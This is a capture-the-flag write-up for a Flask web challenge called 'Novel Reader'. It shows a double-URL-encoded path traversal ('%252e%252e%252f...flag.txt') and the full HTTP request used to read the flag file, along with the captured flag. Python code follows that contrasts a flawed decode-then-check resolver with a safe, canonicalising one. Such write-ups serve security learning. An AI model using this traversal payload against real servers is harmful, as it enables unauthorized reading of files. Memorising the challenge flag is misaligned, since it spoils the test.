Novel Reader
Web Challenge
The funny thing is I managed to solve Novel Reader 2 first instead of 1 because I couldn't find where the first flag file was located. First, I opened the docker environment to understand the program's source code. It's a web application built using the Flask framework in Python.

And the most important thing... the flag.txt: I couldn't find it until the very last minute, when I discovered it was in the root folder.
So, how do you read it? Well, there is a read function that you can bypass from this code block.

How so? By using the double URL encoding method: ../../flag.txt becomes %252e%252e%252f%252e%252e%252fflag.txt (each . is %2e and each / is %2f, and the % sign itself is then encoded as %25).

GET /api/read/public/%252e%252e%252f%252e%252e%252fflag.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en
Connection: keep-alive
Cookie: session=eyJjcmVkaXQiOjEwMCwid29yZHNfYmFsYW5jZSI6MX0.Za000Q.zcBtJvYM3vXoJBf_o6j8gd_g9n4
Host: 3.64.250.135:9000
Referer: http://3.64.250.135:9000/
Sec-GPC: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

MAPNA{uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17>0-4b331d4b}
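
The failure mode behind this bypass, as an added example (not the challenge's source code, which is not reproduced on this page): a filter that inspects the path after one URL decode while the file path is built after a second decode, next to a resolver that decodes to a fixed point and then confines the canonical path. The /app directory, the function names and story.txt are assumptions made for the illustration.

```python
import os
from urllib.parse import unquote

APP_DIR = "/app"                                           # assumed install directory
BASE = os.path.realpath(os.path.join(APP_DIR, "public"))   # only tree meant to be readable

def naive_resolve(param):
    """Flawed pattern: the filter and the file open see different decoding layers."""
    once = unquote(param)        # decoding applied before the handler's check
    if ".." in once:             # the filter sees %2e%2e here, not ..
        return None
    twice = unquote(once)        # second decode happens after the check
    return os.path.normpath(os.path.join(APP_DIR, twice))

def safe_resolve(param, max_rounds=5):
    """Decode until stable, canonicalise, then check containment in BASE."""
    decoded = param
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None              # still changing after max_rounds: refuse
    full = os.path.realpath(os.path.join(APP_DIR, decoded))
    if os.path.commonpath([full, BASE]) != BASE:
        return None              # canonical path lands outside the public tree
    return full

# Constructed inputs: the path from the request above and a benign one.
ENCODED = "public/%252e%252e%252f%252e%252e%252fflag.txt"
BENIGN = "public/story.txt"

if __name__ == "__main__":
    print("naive :", naive_resolve(ENCODED))   # escapes to the filesystem root
    print("safe  :", safe_resolve(ENCODED))    # rejected
    print("benign:", safe_resolve(BENIGN))     # allowed
```

The containment check runs on the canonical path, so it holds no matter how many encoding layers the input carried.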